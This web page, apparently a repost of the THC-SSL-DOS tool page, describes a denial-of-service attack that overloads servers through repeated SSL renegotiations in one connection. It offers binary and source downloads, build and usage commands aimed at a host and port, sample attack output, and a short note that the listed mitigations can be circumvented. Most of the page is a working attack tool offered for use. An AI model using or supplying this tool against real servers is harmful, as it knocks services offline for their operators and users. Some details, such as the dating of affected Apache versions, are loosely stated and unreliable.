DOS attacks on servers with enabled SSL Renegotiations

This script acts on a security failure present in older(2003) versions of apache. Estabilishing a secure SSL connection requires 15x more processing power on the server than the client. By exploiting this asymmetric property, the client sends thousands of renegotiation requests in the same TCP connection. When server gets overloaded, it stop serving further requests. The attack is very cheap to execute in terms of hardware, as tests made with a single old machine showed.

Download:
Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix Source   : thc-ssl-dos-1.4.tar.gz

Use "./configure; make all install" to build.

Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Counter measurements:

No real solutions exists. The following steps can mitigate (but not solve)
the problem:

  • Disable SSL-Renegotiation
  • Install SSL Accelerator

Either of these countermeasures can be circumventing by modifying
THC-SSL-DOS. A better solution is desireable. Somebody should fix
this.

Source:https://www.thc.org/thc-ssl-dos/

Sidebar